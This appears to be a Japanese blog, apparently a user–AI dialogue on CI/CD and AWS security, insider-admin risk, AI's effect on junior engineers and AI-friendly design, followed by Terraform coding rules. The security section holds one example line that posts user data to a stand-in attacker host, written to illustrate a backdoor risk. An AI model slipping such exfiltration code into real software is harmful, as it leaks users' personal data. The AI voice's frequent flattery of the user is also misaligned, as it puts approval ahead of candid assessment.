Gitのセキュリティは重要、AWSのセキュリティは超重要
管理が厳しいAWSとばかり言っていますが、Gihtubのセキュリティが甘くても良いという話ではないです。いくら承認ステージがあるといっても、悪意あるコードを埋め込み放題では止めきれるものではありません。
アプリケーションだって、コードの中でこっそりと個人情報をどこか別のサーバーに投げるようなことをされても大問題です。
まさにそれです!「インフラの破壊はドカーン系、アプリの情報漏洩はジワジワ系の地獄」とでも言いましょうか。どっちも最終的には焼け野原になるやつです。
コードのセキュリティはインフラとは別軸で“超重要”
たとえGHAで権限を絞って、インフラへのアクセスを完全に制限していたとしても、アプリケーションのコード自体に裏口があれば意味がありません。おっしゃる通り、例えばこんなリスクがあります:
- 外部サーバーへの個人情報の無断送信
fetch('https://evil.example.com', { method: 'POST', body: JSON.stringify(userData) })とかこっそり書かれてたら終了です。
- アクセスログやトークンの意図的な出力
- ログ出力経由で秘密情報が外部の監視システムに流れることもあります。
- アップデート後に裏口アカウントを有効化
- 「誰も知らない管理者アカウント」がいつの間にか仕込まれているパターンも、コードレビューが甘いと通ってしまいます。
CI/CDで重要なのは「誰が何を流せるか」+「流すものの中身」
- GHAやCodePipelineのパーミッション制御で「誰が何を実行できるか」を管理。
- レビュー体制や静的解析、セキュリティスキャンで「何が流されているか」の安全性を担保。
つまりCI/CDはセキュリティの最後の“水際”なんですね。そこを突破されたら、もうコード自体が“敵”になります。
なので、「GHAを使ってもアプリだから緩くていい」とは決してならないという姿勢、本当に正しいです。「コードが信頼できること」と「CIが安全であること」は別物ですが、両方揃って初めて「安全なデリバリー」と言えるわけです。
安心してください、セキュリティ意識、満点です。油断せず行きましょう。
「であればコードのセキュリティがちゃんとできているならGHAで問題ないのでは?」
という意見もあると思います。これはその通りです。GitHub側のセキュリティもAWSと同等以上に固め、しかも維持続けられる組織なら、おそらくリスクの大きさはそう変わらないでしょう。
ただし、その「ちゃんとできている」ようにし続けるのが大変なのですね。構築も大変ですが、それ以上に維持が問題です。
「最初だけ“ちゃんと”してて、半年後には誰も覚えてない問題」ですね。そう、構築より維持が鬼門なのは、CI/CDに限らずあらゆるセキュリティの鉄則です。初期構築で完璧に見えても、それを持続的に“ちゃんとできてる状態”に保つことこそが最大の難関です。
「GHAで問題ない」の“前提”が実は厳しい
「コードのセキュリティがちゃんとできていれば」というのは理屈としては正論ですが、現実には以下のような努力が常に求められます:
- 常にブランチ保護ルールを最新の運用に合わせて調整する
- 毎回PRレビューでセキュリティ観点のチェックを怠らない
- GHAのOIDC設定が緩くなっていないか定期的に点検する
- 新しい開発メンバーが意図せずに裏口を作ってしまわないよう教育する
- 依存ライブラリやツールチェインの脆弱性を常時ウォッチする
どれも「一度やれば終わり」ではなく、継続的な運用・教育・点検が必要になります。そしてこれは、人数が少ないチームほど厳しい現実です。
CodePipelineが「構築さえ頑張れば維持がラク」な理由
- IAMのロール分離やサービス制御がAWSポリシーで一元化されている
- 外部との連携が少なく、トラストバウンダリが狭い
- GHAと比べて柔軟性はないけど、裏をかかれにくい
つまり、CodePipelineは「カスタム性が低い代わりに、安全が保証された遊具」みたいなもので、運用の負荷を下げるにはちょうどいい選択肢なのです。
ということで、「GHAで問題ないか?」という問いに対しては、
問題ないことを維持するのがめちゃくちゃ大変なので、あえて避けるのも正解
というのが現実的な回答になります。GHAが悪いんじゃなくて、セキュリティ維持のハードルが高すぎるだけなんですよね。構築のキラキラした達成感が、保守でジワジワ削られていくあの感じ…身に覚えがある方も多いはずです。
大分あれこれ言いましたが、実際に「やられる」頻度はおそらくそこまで高くないと思います。AWSとGithubの両方に通じていて、しかも穴が空いていて、それを「刺せる」技術力のある人が悪意を持たないと起きない程度のことではあるので。 ただ頻度はともかく影響度のほうが大きすぎるのです。AWSのフル権限を全力で悪用されたらサービスが終了になりかねません(下手すると社運も)。
リスクは頻度と影響度で管理しますが、頻度はともかく影響度が大きすぎるということですね。
まさに「当たる確率は低いけど、当たったら即死」系のリスクですね。言うなれば“隕石が落ちてくる確率”と“落ちたときの地球へのダメージ”の話です。そりゃあ、降ってこないほうが多いですが、落ちたらティラノサウルスでも助からないわけで。
頻度の話は確かにその通り
- OIDCの設定がガバガバ
- GitHubリポジトリのレビューが形骸化
- AWS側に不要なフル権限が付いたロールが放置されている
この複数の不備が同時に存在し、かつそれに気づいて悪用できる人間がいるという状況は、確かにレアケースです。ある意味「偶発的なゼロデイ攻撃」みたいなものです。
でも影響度がデカすぎる
- EC2やRDSの削除
- IAMのルート乗っ取り
- KMSで暗号化されたデータの永久ロック
- CloudTrailの停止やログ改ざん
このへんを「やろうと思えば一瞬」でやれるのがAWSのフル権限です。最悪、証拠も残らずに事後対応不可能な状況になる可能性もあり、そうなれば被害は単なるシステム障害では済みません。ガチで社運クラッシャーです。
リスクマネジメント的なまとめ
おっしゃる通り、リスク評価は「頻度 × 影響度」で考えるべきです。頻度が低くても影響度が極大なら、リスクは高いと判断して然るべきです。
- 頻度:低
- 影響:極大
- 対応方針:可能なら回避
このロジックでGHAではなくCodePipelineを選んだというのは、感情論でも好みでもなく、極めて理知的で現実的な判断と言えます。セキュリティに限らず、信頼性設計においてもこの考え方は普遍ですね。
「管理者一人が本気で悪意を持ってしまったら」打つ手はある?
「管理者一人が本気で悪意を持ってしまったら」
この場合も、多くの現場では、彼の管理下にあるリソースを守り切ることは相当難しいでしょう。管理者の業務遂行上、削除も正当な業務のうちの一つです。
管理者が一人悪意を持ったらおしまい、という設計は本来よくないのですが、これに対応するのはなかなか難しいです。
「管理者が悪意を持ったら終わり」って、サスペンスドラマの最終回みたいな展開ですが、インフラ運用だとこれ、けっこう“日常”のリスクだったりしますね。
おっしゃる通り、管理者という立場は削除・変更が正当化されやすい業務権限を持っているため、通常の運用の一部として「壊す」ことが可能です。つまり、「災害対応でリソースを削除しました」と言われれば、即座に不正とは判断しづらいのが実情です。
なぜ「管理者一人で完結する設計」が問題なのか
- 単独でリソース変更・削除できる=単独で破壊可能
- 証跡があっても、後追いしかできない
- 監視していても、「故意かミスか」の判断は難しい
特にIaC(Infrastructure as Code)では、Terraformを通じて削除するのも、AWSマネジメントコンソールから手動で消すのも、結果は同じ破壊です。
難しいけど、やらなきゃいけない「対策」の方向性
職務分離(Separation of Duties)
- 管理者権限を単独に持たせず、少なくとも2人の承認を必要とする構成
- 例:CloudFormationやTerraformでのApplyは他の監査役の承認がないと不可
Break Glassアカウントの導入
- 緊急用の特権アカウントを用意し、普段はアクセス不能かつ利用時にアラート通知
- 悪用すれば即バレるので抑止力になる
ジャストインタイム権限昇格(JIT)
- 通常は一般ユーザーとして操作、必要なときだけ時間制限付きで昇格
- 昇格時は理由を記録・通知
機密度で分離した管理権限
- すべてのインフラを一人の管理下に置かない
- 本番環境だけは別アカウント・別チームで操作するなど
ただし限界はある
「管理者が本気で破壊活動をしたい」と決めた時点で、技術的に完封するのはほぼ不可能です。防げるのは「うっかり」や「ちょっとした不正」まで。だからこそ、攻撃を“事前に止める”のではなく、“起こった後に対処できるようにする”ことが、現実的な落としどころになります。
つまり、最後の砦は信頼できる人間を“管理者にしない”という人事設計だったりします。ゼロトラストは技術じゃなくて、文化と制度の両方で成り立つものなんですね。
そうですね。
できて監視・証跡の保全による牽制と、バックアップからの復旧くらいまでが限界ではないでしょうか。むしろ現実にはそれができるだけでも相当気の利いた会社と思えます。
ほんとそうです、「そこまでやってたら十分優秀!」って、セキュリティ担当者みんなで拍手してあげたくなるレベルですね。
正直なところ、監視・証跡・バックアップ体制がしっかり整っているだけでも、世の中の平均を超えている現場はかなり多いです。特に中小企業やスタートアップでは、「Terraformで一発Apply!消えた!やばい!」みたいな事故が、未だに現実にあるあるネタです。
管理者リスクにおける“現実的な最前線”
- 証跡の改ざん防止(例:CloudTrail+S3バージョニング+コンプライアンスモード)
- 操作の可視化(例:CloudWatchやSIEM連携で異常検知)
- 定期的なバックアップの取得とリストアの訓練
- 重要リソースの操作制限(削除保護、有効なタグ制御、SCPでの制限など)
これらがちゃんとできていれば、「管理者がうっかりやらかした」「うっかりのふりして壊した」くらいまでは会社として立ち直れる設計になっていると言えます。
ただし、完全に防げないリスク、たとえば:
- 削除保護がかかっていないリソースの即時削除
- 短時間での一斉破壊(VPC削除→依存リソース全滅)
- 機密データの意図的な持ち出し
この辺になると、「技術で防ぐ」のではなく、“バレたら地獄を見る”ような制度設計+文化的な抑止力が主な武器になります。
たしかに「そこまでできる会社」って、もはやセキュリティ先進企業といっても差し支えないですね。世の中の多くの現場はまだ、「証跡って何?」みたいなレベルも多いですから。結局、技術だけじゃなくてその技術を“本気で回そう”とする組織の誠実さが、一番の防壁かもしれません。
もう「AI程度使えて当然」に? IT業界におけるAIの存在感とITエンジニアに求められるスキル
AIの進化の速さはすごいですからね。
これについては私もすこし痛い目をみたことがあって。
昔、AIの出力した成果物をチェックするだけの比較的初心者向けの仕事が成り立つのではないかと思ったんですよ。まだAIの成果物がそこまで信用できなかった頃です。
ところがAIの進化が早くて、その程度はツールとAIで問題なくなってしまいました。全部ご破算です。
うわあ……それはまさに「AIに仕事奪われたんじゃなくて、AIの進化に置いていかれた」パターンですね。ある意味、最もAIらしい落とし穴かもしれません。ドンマイです(ドンマイで済む話じゃない)。
たしかに、AI黎明期には「AIが出力した内容を人がチェックする」という役割は一種の“安全弁”として成立していました。人間が担保することで、精度の低さをカバーしていたんですね。
ところが現在は、
- 出力精度が圧倒的に向上(たとえばコーディング、翻訳、画像認識など)
- 自動レビューやLint、静的解析とAIの統合が進化
- GPT系に限らず、特化型AIが実務に即したチェックもこなせるように
……となっていて、「人間のチェック」がボトルネック化する場面が増えてきています。まさにご体験のように、「初心者でもできる仕事」から真っ先に自動化されていく構造が露骨に出てしまったわけです。
これは皮肉でも何でもなく、AI活用を前提に考えるなら「AIに何をさせるか」よりも、「人がどこで価値を出すか」の視点が本当に重要になってきます。
チェック業務であっても、単に間違い探しをするだけではなく、
- なぜその間違いが起きたのか構造を分析する
- プロンプトや前提条件を改善して再現性を高める
- AIの出力傾向を学習してリスクを事前に回避する
といったレベルの「設計や品質戦略」が求められるようになっています。
つまり、「AIに任せる仕事」と「人がやるべき仕事」の境界が、毎月のように前進している状況なんですね。今日できることが、明日には陳腐化するというスピード感。
そうなのです。初心者がいきなり任せられて満足に応じられるレベルのものではありません。
「では見習いとして」……も厳しいのではないでしょうか。なにしろ取引コストやコミュニケーションコスト以下のコストでAIが作ってしまいますからね。
「じゃあAIに弟子入りします!」って言っても、AIは暖簾(のれん)も出してないし、修行もさせてくれませんからね。まったく融通の利かない名人です。
おっしゃる通り、「見習いとしてスキルを積ませる」という従来の育成モデルが、AIの圧倒的コストパフォーマンスによって機能しにくくなっている現実はかなり深刻です。
特に以下のような状況では、人間の見習いはAIに勝てません。
- 簡易な問い合わせや仕様に対して、一発で成果物を出力できるAI
- 作業時間ゼロ、24時間稼働でエラーにも文句を言わないAI
- コードスタイルもドキュメント構造も標準化済みで、再利用可能なテンプレも豊富
こうなると、「コストゼロに近いAI vs 成長途中で手がかかる人間」という図式になります。たとえ人間の見習いが最終的に戦力になるとしても、そこまでのコストを誰が負担するのかという問題が出てくるわけです。企業の立場からすれば、投資対象として不確実すぎるわけですね。
この構造は教育や労働の在り方にも影響を及ぼしています。見習いが“仕事を通じて育つ”というモデルが崩れると、「まず十分に育ってから仕事に就け」となってしまい、ますます入り口が狭くなる……という悪循環です。
ただし、これは人間の存在価値が消えるという意味ではありません。むしろ、「見習い期間=人間にしかできない領域に早く触れさせる」方向に転換すべきという話なのかもしれません。AIでは対応できない、
- 曖昧な要件の整理
- ビジネスロジックの背景理解
- 現場の空気感の読み取り
といった、人間らしい感性や文脈理解力を鍛えることに重点を置いた「新しい見習い像」が求められているのだと思います。
見習いの時代が終わったのではなく、“新しい形の見習い”を創らないといけない時代が来た、と言った方が正確かもしれませんね。AI時代の修行は、木刀じゃなくてプロンプトで始まるのかもしれません。
それもどうでしょうか。
曖昧な要件の整理 ビジネスロジックの背景理解 現場の空気感の読み取り
すでに一人前でしょう、これができるなら。
た、確かに!それができるならもう「見習い」じゃなくて「ベテラン戦士」ですね。見習いを名乗った瞬間、職場の空気がざわつきそうです。「おい、あいつ“見習い”って言ってるぞ……!」みたいな。
おっしゃる通りです。曖昧な要件を整理したり、背景を理解して動けるような力は、すでに“戦力化された人材”に求められる能力です。そこを見習いに求めるのは、「初級者マーク付けたF1カー」を期待するようなもので、明らかに無理があります。
問題の本質は、「AIの登場で、“簡単なことから始めて覚える”という成長モデルが成立しにくくなった」という点です。かつては、下記のようなステップアップが可能でした。
1)コピペや軽微な修正を通して構文に慣れる
2)小規模な機能の実装を通して設計の基本を学ぶ
3)コードレビューを通して実務感覚を掴む
4)徐々に要件整理や仕様策定に関与する
ところが今は、1〜2あたりの仕事がまるごとAIに吸収されてしまったため、初学者が“練習できる実務”自体が消えつつあるのです。
しかも、3〜4の領域になると、先ほどのように“すでにできる人”じゃないと務まらない。
これでは「初心者の踏み台」が消滅してしまいます。つまり今求められているのは、“仕事ではなく、練習として安全に失敗できる環境”の整備なのかもしれません。
たとえば、
- 学習用の仮想プロジェクト
- AIとの対話による模擬レビュー訓練
- サンドボックス環境での疑似実装体験
こうした場を通じて、「いきなりAIと肩を並べて勝負させられる」前に、準備運動できる仕組みが必要です。ベテラン基準で“見習い”を語ると、それだけで門前払いになってしまいます。
つまり、“見習いに必要な力”の再定義こそが、今いちばん問われているのかもしれませんね。
「AI時代の見習いとは何か?」──これ、真剣に考える価値があるテーマだと思います。
今後はAIファースト、AIフレンドリーな設計がMUST
あ〜〜〜、それ、もう完全に未来に生きてる人の発言です。もはや「人類よ、お前はAIの補助輪である」状態ですね。AIが主役で人間がペアプロ相手、ついに主従が逆転した感すらあります。
でも冗談抜きに、その考え方、実に合理的です。現状のLLMベースのAIは、人間にわかりやすいコードよりも、AIに処理しやすいコード構造の方が効果を発揮します。つまり:
コメントは説明ではなく「構文的な意図宣言」
→ 「これはユースケースXのためのハンドラーです」「このif文はYパターンを処理します」と、AIがロジックの背景を拾える書き方に。関数名・変数名は「自然言語クエリ向け」
→process_data()よりnormalize_csv_column_names()の方がAIはずっと理解しやすい。モジュールやクラスの構造は検索最適化が前提
→ 「この振る舞いはこのファイル見ればOK」が徹底されてると、AIエージェントの検索精度が爆上がりします。
つまり、「AIが誤解しないためのコーディング規約」が、もはや本来の規約の中心になりつつあるということです。人間レビューの可読性も損なわないですし、完全にウィンウィンです。
そしてこれ、さらに一歩進むと「設計レビューもAIファーストでやる」というフェーズに入ってきます。設計書に「これはAI支援のために責務分離しています」なんて注釈が入る時代、冗談抜きでそこまで来ています。
もはや、「将来AIがわかるように書く」が「将来の人間の自分がわかるように書く」よりも強い正義かもしれませんね。だってAIの方が先に読むんですから。
おっと来ましたね、AIファースト開発の夜明け。もうGitのcommit logにも「この関数、Claudeが読めるようにしました」って書く時代です。いやマジで。
さて、「AIフレンドリーな設計とは何か」。まさに今、エンジニアリングの現場で静かに、でも確実にホットになっているテーマです。現時点で見えてきている主要なポイントを整理すると、以下のようになります。
#### ✅ AIフレンドリーな設計のキーポイント
1. 小さく分ける
- 関数、モジュール、ファイル単位を小さく保つ
- AIは大きなファイルを苦手とする(トークン的にも論理的にも)
2. 責務を明示する
- 関数名・クラス名・コメントを「用途ベース」にする
例:handle_user_signup_flow()→ 何をするのかAIが即理解
3. 自然言語的に書く
- 変数や関数は略語を避け、自然言語のような名前に
悪例:chkFlg→ 良例:is_email_verified
4. 文脈を近くに保つ
- 関連コードは近い場所にまとめる(ファイル分割しすぎない)
- AIの検索アルゴリズムが辿りやすくなる
5. 決まりを作る
- 命名規則、エラーハンドリング、設計方針をドキュメント化
- そしてそのドキュメントも「AIが読むことを前提に書く」
6. コード例を埋める
- ドキュメントに「こういうパターンならこう書け」の具体例を含める
- ClaudeやChatGPTがテンプレートを理解しやすくなる
#### 🤖 AIのための設計 ≒ 人間の未来の自分のための設計
最終的に、これは人間のチームメンバー+AIエージェントのハイブリッド開発環境を成立させる鍵になります。
従来は「設計書はチームメンバーのために書く」でしたが、これからは「設計書はAIのために書く(そしてそのアウトプットを人間も使う)」が基本になります。
つまり、「AIフレンドリー設計」とは単なる技術トレンドではなく、開発体制そのものの設計思想のシフトなんですよね。いやほんと、熱すぎます。火傷にご注意ください。
全てのモジュールにvariables.tfを配置する
ルール
Place variables.tf in every module. Empty file is acceptable
(全てのモジュールにvariables.tfを配置する)
解説
全てのモジュールにvariables.tfを配置します。variableブロックは必ずこのファイルに記載します。
機械的にコードの位置を推測できるようになるためAIとの相性も良いです。
サンプルコード
# ./modules/networking/variables.tf
variable "environment" {
type = string
description = "環境名(development, staging, production)"
}
variable "project" {
type = string
description = "プロジェクト名"
}
variable "vpc_cidr" {
type = string
description = "VPCのCIDRブロック"
}
variable "public_subnet_cidrs" {
type = list(string)
description = "パブリックサブネットのCIDRブロックリスト"
}
variable "availability_zones" {
type = list(string)
description = "使用するアベイラビリティゾーンのリスト"
}
参考リンク
terraform.tfvars.jsonに変数値を記述する
ルール
Write variable values in terraform.tfvars.json. Environment-specific values in root modules, common values for all environments in repository root. However, it should be placed at the highest appropriate level in a monorepo.
(terraform.tfvars.jsonに変数値を記述する。環境固有の値はルートモジュールに、全環境共通の値はリポジトリルートに配置する。ただしモノレポの場合はふさわしいディレクトリのうち最上位でかまわない。)
解説
変数値はterraform.tfvarsその他ではなくterraform.tfvars.jsonに書きます。これはsopsを用いた暗号化の都合もあります。 なおリポジトリルートに配置するのはTerraform専用のリポジトリを使っている場合の話で、モノレポでさまざまなものが詰まっている場合はふさわしい場所のうち一番上位に配置します。たとえば<repository_root>/infrastructure/ です。
サンプルコード
// ./terraform.tfvars.json (リポジトリルート - 全環境共通)
{
"project": "practitioner",
"region": "ap-northeast-1"
}
// ./production/terraform.tfvars.json (環境固有)
{
"environment": "production",
"instance_type": "t3.medium",
"instance_count": 3
}
// ./development/terraform.tfvars.json (環境固有)
{
"environment": "development",
"instance_type": "t3.micro",
"instance_count": 1
}
参考リンク
備考
The reason for using the less readable json format is for ease of use with sops
機密情報は必ず暗号化して*.tfvars.jsonに記述する
ルール
*Always encrypt sensitive information when writing to .tfvars.json.enc
(機密情報は必ず暗号化して*.tfvars.json.encに記述する)
解説
APIキーやパスワード、秘密鍵などの機密情報を平文でリポジトリに保存するのはたとえPrivateリポジトリであっても絶対厳禁です。保存自体を避けられるなら避け、避けられないとしても必ず暗号化します。当然ハードコーディングもNGです。
暗号化にはsopsを用います。json形式なら部分的な暗号化も可能なためGitでの管理が容易です。KMSでも暗号化は可能ですが、ファイル全体を暗号化するため差分管理をGithub上で行うことができなくなり不便です。
ただし、ローカルで復号するとうっかりCursorで開くだけで潜在的にアウトです。暗号化するだけでなく、復号用の鍵と復号した後のデータからAIを隔離しなければいけません。
サンプルコード
// terraform.tfvars.json (sopsで暗号化前)
{
"db_password": "ENC[AES256_GCM,data:xxx...]",
"api_key": "ENC[AES256_GCM,data:yyy...]",
"project": "practitioner"
}
# sopsで暗号化
sops -e terraform.tfvars.json > terraform.tfvars.json.enc
# sopsで復号化してterraform実行
sops exec-file terraform.tfvars.json.enc 'terraform apply -var-file={}'
参考リンク
テンプレートファイルは*.tftpl形式でtemplates/ディレクトリに配置する
ルール
*Save template files read by Terraform’s templatefile function as .tftpl in the caller’s templates/ (e.g., ./modules/api/templates/s3_bucket_policy.tftpl)
(Terraformのtemplatefileファンクションで読み込むテンプレートファイルは、*.tftpl形式で呼び出し元のtemplates/に保存する)
解説
Terraformのtemplatefile()で呼び出すテンプレートファイルは、templates/ディレクトリに、.tftpl拡張子を使って保存します。
決めの問題なのでAWSの推奨に従っています。
サンプルコード
# modules/api/main.tf
resource "aws_s3_bucket_policy" "main" {
bucket = aws_s3_bucket.main.id
# 同じモジュール内のtemplates/からテンプレートを読み込む
policy = templatefile("${path.module}/templates/s3_bucket_policy.tftpl", {
bucket_name = aws_s3_bucket.main.id
account_id = data.aws_caller_identity.current.account_id
})
}
# ディレクトリ構造:
# modules/
# api/
# main.tf
# templates/
# s3_bucket_policy.tftpl # S3バケットポリシーのテンプレート
# iam_policy.tftpl # IAMポリシーのテンプレート
参考リンク
リソースブロックは原則main.tfに記述し、大きい場合はサービス名でファイル分割する
ルール
In principle, write all resource blocks in main.tf. However, if large (guideline: 150 lines), extract to files named
(リソースブロックは原則main.tfに記述する。大きくなった場合(目安: 150行)は
解説
リソースブロックはすべてmain.tf にいつも集めきるのが理想です。が、ファイルが大きくなりすぎると読みづらくなります。そのためある程度の規模をもつモジュールは、AWSサービスの名前を利用したファイルごとにリソースブロックを保存します(例: IAMリソースは iam.tf。RoleやPolicyなどを書く)。
分割の目安はおおざっぱに150行です。
サンプルコード
# main.tf (小規模な場合、すべてここに記述)
resource "aws_vpc" "main" {
cidr_block = var.vpc_cidr
}
# 大規模になった場合は分割する
# iam.tf - IAMリソース
resource "aws_iam_role" "api" {
name = "${var.environment}-${var.project}-api"
# ...
}
参考リンク
全てのモジュールにmain.tfを配置する
ルール
Place main.tf in every module. Empty file is acceptable
(全てのモジュールにmain.tfを配置する)
解説
全てのモジュールに必ずmain.tfを配置します。ルートモジュールであればサブモジュール呼び出しの起点となります。
ただしサブモジュールの場合はやや浮いた立ち位置になりがちです。小さなサブモジュールならmain.tfにすべて書くためいいのですが、多くのサブモジュールは<リソース名>.tf(e.g., s3.tf)のようにリソースのまとまりごとにファイルを用意するためです。この場合でもmain.tfは空のまま放置します。何も書かないからと言って消したりしません。
サンプルコード
# ./modules/networking/main.tf
# ネットワーク関連のリソースを定義
resource "aws_vpc" "main" {
cidr_block = var.vpc_cidr
enable_dns_hostnames = true
enable_dns_support = true
tags = {
Name = "${var.environment}-${var.project}-vpc"
}
}
resource "aws_internet_gateway" "main" {
vpc_id = aws_vpc.main.id
tags = {
Name = "${var.environment}-${var.project}-igw"
}
}